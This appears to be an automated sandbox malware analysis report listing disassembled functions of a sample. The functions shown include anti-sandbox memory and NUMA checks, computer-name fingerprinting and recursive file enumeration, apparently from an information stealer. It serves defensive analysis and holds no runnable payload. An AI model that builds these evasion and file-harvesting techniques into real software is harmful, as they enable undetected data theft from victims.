                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: 35c8a6f0b76b6f60f3d2dc8c280533c5e10cf0f8c2554a9b10c645bc78704f8c
                            • Instruction ID: f88a1d82f60bbbb8780c213b6ef49dcd651738dac66843b7bf5bfb19d18d9ce2
                            • Opcode Fuzzy Hash: 35c8a6f0b76b6f60f3d2dc8c280533c5e10cf0f8c2554a9b10c645bc78704f8c
                            • Instruction Fuzzy Hash: 8AE09270104345EFCB019BB4CC98D4A7B6CEF05305F4008A9E8054F1A6D73094148765
                            Function 001210C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2948 1210c0-1210cb 2949 1210d0-1210dc 2948->2949 2951 1210de-1210f3 GlobalMemoryStatusEx 2949->2951 2952 121112-121114 ExitProcess 2951->2952 2953 1210f5-121106 2951->2953 2954 12111a-12111d 2953->2954 2955 121108 2953->2955 2955->2952 2956 12110a-121110 2955->2956 2956->2952 2956->2954
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitGlobalMemoryProcessStatus
                            • String ID: @
                            • API String ID: 803317263-2766056989
                            • Opcode ID: cba39bf094438caa7a97ed67755650414dc4a5628c3164e5bbab358598cf85a6
                            • Instruction ID: 46216e4f667269f37b51982e639554ea27782da302a2bc38a71daa14af9369e6
                            • Opcode Fuzzy Hash: cba39bf094438caa7a97ed67755650414dc4a5628c3164e5bbab358598cf85a6
                            • Instruction Fuzzy Hash: ABF027701082A4ABEB14EA74FC1A72DF7D8EB20351F600929EE9AC21D0E330C870953B
                            Function 00142CA0 Relevance: 4.5, APIs: 3, Instructions: 44memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2957 142ca0-142cf2 GetProcessHeap RtlAllocateHeap GetComputerNameA 2958 142d14-142d29 2957->2958 2959 142cf4-142d06 2957->2959
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00142CCF
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00142CD6
                            • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00142CEA
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateComputerNameProcess
                            • String ID:
                            • API String ID: 1664310425-0
                            • Opcode ID: 6e5880010848956a4d66f74e3c944d3f9119c05408b025a969d3c770c6bc5240
                            • Instruction ID: 4f682523e097cac0a705c1c0815674b0e2dee9f31d645c68ba9dc949f206629d
                            • Opcode Fuzzy Hash: 6e5880010848956a4d66f74e3c944d3f9119c05408b025a969d3c770c6bc5240
                            • Instruction Fuzzy Hash: 2D01D172A44248EBD710CF99ED45BAAF7BCFB44B22F10026BFE19E3790D774590486A1
                            Function 0012100D Relevance: 4.5, APIs: 3, Instructions: 32memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00121046
                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 0012104D
                            • ExitProcess.KERNEL32 ref: 00121058
                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 0012106C
                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 001210AB
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                            • String ID:
                            • API String ID: 3477276466-0
                            • Opcode ID: ddd72d96490f19ae7643bee3b2134200aeab6f94e92847442e5720deec39060c
                            • Instruction ID: 2b29fb05ac99c9b3efb5e4390627b7343fd63c90f1d5458de98214b5c4996a9a
                            • Opcode Fuzzy Hash: ddd72d96490f19ae7643bee3b2134200aeab6f94e92847442e5720deec39060c
                            • Instruction Fuzzy Hash: DAE0C2B02883C0BBE62207A26C5EF123F2C9B02B06F014445F340EB0E2D695B400DA38

                            Non-executed Functions

                            Function 001324E0 Relevance: 223.6, APIs: 126, Strings: 1, Instructions: 1308stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00132524
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00132547
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00132552
                            • lstrlen.KERNEL32(\*.*), ref: 0013255D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013257A
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 00132586
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001325BA
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 001325D6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID: \*.*
                            • API String ID: 2567437900-1173974218
                            • Opcode ID: 051cdaf315fc359072aa1b80e584c98a2a63fa6360d6282ae065a3d0b4dcbfbb
                            • Instruction ID: 28b94439c4491807f875e41f7822fdce3674754638db113fe3a2306e12345ff8
                            • Opcode Fuzzy Hash: 051cdaf315fc359072aa1b80e584c98a2a63fa6360d6282ae065a3d0b4dcbfbb
                            • Instruction Fuzzy Hash: D8A2B031A01736EBCB22AF74EC89BAE77B9AF18701F044529F815E7261DB34DD458B90
                            Function 001216A0 Relevance: 202.4, APIs: 114, Strings: 1, Instructions: 1164stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 001216E2
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00121719
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012176C
                            • lstrcat.KERNEL32(00000000), ref: 00121776
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001217A2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001217EF
                            • lstrcat.KERNEL32(00000000,00000000), ref: 001217F9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00121825
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00121875
                            • lstrcat.KERNEL32(00000000), ref: 0012187F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001218AB
                            • lstrcpy.KERNEL32(00000000,?), ref: 001218F3
                            • lstrcat.KERNEL32(00000000,00000000), ref: 001218FE
                            • lstrlen.KERNEL32(0015179C), ref: 00121909
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00121929
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00121935
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012195B
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00121966
                            • lstrlen.KERNEL32(\*.*), ref: 00121971
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012198E
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 0012199A
                              • Part of subcall function 00144250: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 0014427D
                              • Part of subcall function 00144250: lstrcpy.KERNEL32(00000000,?), ref: 001442B2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001219C3
                            • lstrcpy.KERNEL32(00000000,?), ref: 00121A0E
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00121A16
                            • lstrlen.KERNEL32(0015179C), ref: 00121A21
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00121A41
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00121A4D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00121A76
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00121A81
                            • lstrlen.KERNEL32(0015179C), ref: 00121A8C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00121AAC
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00121AB8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00121ADE
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00121AE9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00121B11
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00121B45
                            • StrCmpCA.SHLWAPI(?,001517A8), ref: 00121B70
                            • StrCmpCA.SHLWAPI(?,001517AC), ref: 00121B8A
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00121BC4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00121BFB
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00121C03
                            • lstrlen.KERNEL32(0015179C), ref: 00121C0E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00121C31
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00121C3D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00121C69
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00121C74
                            • lstrlen.KERNEL32(0015179C), ref: 00121C7F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00121CA2
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00121CAE
                            • lstrlen.KERNEL32(?), ref: 00121CBB
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00121CDB
                            • lstrcat.KERNEL32(00000000,?), ref: 00121CE9
                            • lstrlen.KERNEL32(0015179C), ref: 00121CF4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00121D14
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00121D20
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00121D46
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00121D51
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00121D7D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00121DE0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00121DEB
                            • lstrlen.KERNEL32(0015179C), ref: 00121DF6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00121E19
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00121E25
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00121E4B
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00121E56
                            • lstrlen.KERNEL32(0015179C), ref: 00121E61
                            • lstrcpy.KERNEL32(00000000,?), ref: 00121E81
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00121E8D
                            • lstrlen.KERNEL32(?), ref: 00121E9A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00121EBA
                            • lstrcat.KERNEL32(00000000,?), ref: 00121EC8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00121EF4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00121F3E
                            • GetFileAttributesA.KERNEL32(00000000), ref: 00121F45
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00121F9F
                            • lstrlen.KERNEL32(013F8FF8), ref: 00121FAE
                            • lstrcpy.KERNEL32(00000000,?), ref: 00121FDB
                            • lstrcat.KERNEL32(00000000,?), ref: 00121FE3
                            • lstrlen.KERNEL32(0015179C), ref: 00121FEE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012200E
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 0012201A
                            • lstrcpy.KERNEL32(00000000,?), ref: 00122042
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0012204D
                            • lstrlen.KERNEL32(0015179C), ref: 00122058
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00122075
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00122081
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                            • String ID: \*.*
                            • API String ID: 4127656590-1173974218
                            • Opcode ID: e949b4e775fb3dcc9fbe03fdfa5ebcf491b44995c9e154cebc922ef55e65f08e
                            • Instruction ID: c6b66c52c388126c6a089beab822ad39df3844e58c20b7ca00458a58654de5c6
                            • Opcode Fuzzy Hash: e949b4e775fb3dcc9fbe03fdfa5ebcf491b44995c9e154cebc922ef55e65f08e
                            • Instruction Fuzzy Hash: CD92913190163AFBCB22EF64EC89BAE77B9AF24705F040125F805A7265DB34DD55CBA0
                            Function 001319F0 Relevance: 156.7, APIs: 88, Strings: 1, Instructions: 909stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00131A22
                            • lstrlen.KERNEL32(\*.*), ref: 00131A2D
                            • lstrcpy.KERNEL32(00000000,?), ref: 00131A4F
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 00131A5B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131A82
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00131A97
                            • StrCmpCA.SHLWAPI(?,001517A8), ref: 00131AB7
                            • StrCmpCA.SHLWAPI(?,001517AC), ref: 00131AD1
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00131B0F
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00131B42
                            • lstrcpy.KERNEL32(00000000,?), ref: 00131B6A
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00131B75
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131B9C
                            • lstrlen.KERNEL32(0015179C), ref: 00131BAE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131BD0
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00131BDC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131C04
                            • lstrlen.KERNEL32(?), ref: 00131C18
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131C35
                            • lstrcat.KERNEL32(00000000,?), ref: 00131C43
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131C69
                            • lstrlen.KERNEL32(013F9058), ref: 00131C7F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131CA9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00131CB4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131CDF
                            • lstrlen.KERNEL32(0015179C), ref: 00131CF1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131D13
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00131D1F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131D48
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131D75
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00131D80
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131DA7
                            • lstrlen.KERNEL32(0015179C), ref: 00131DB9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131DDB
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00131DE7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131E10
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131E3F
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00131E4A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131E71
                            • lstrlen.KERNEL32(0015179C), ref: 00131E83
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131EA5
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00131EB1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131EDA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131F09
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00131F14
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131F3D
                            • lstrlen.KERNEL32(0015179C), ref: 00131F69
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131F86
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00131F92
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131FB8
                            • lstrlen.KERNEL32(013FD3A0), ref: 00131FCE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00132002
                            • lstrlen.KERNEL32(0015179C), ref: 00132016
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00132033
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 0013203F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00132065
                            • lstrlen.KERNEL32(013FD9F8), ref: 0013207B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001320AF
                            • lstrlen.KERNEL32(0015179C), ref: 001320C3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001320E0
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 001320EC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00132112
                            • lstrlen.KERNEL32(013EBA08), ref: 00132128
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00132150
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0013215B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00132186
                            • lstrlen.KERNEL32(0015179C), ref: 00132198
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001321B7
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 001321C3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001321E8
                            • lstrlen.KERNEL32(?), ref: 001321FC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00132220
                            • lstrcat.KERNEL32(00000000,?), ref: 0013222E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00132253
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0013228F
                            • lstrlen.KERNEL32(013FD448), ref: 0013229E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001322C6
                            • lstrcat.KERNEL32(00000000,00000000), ref: 001322D1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
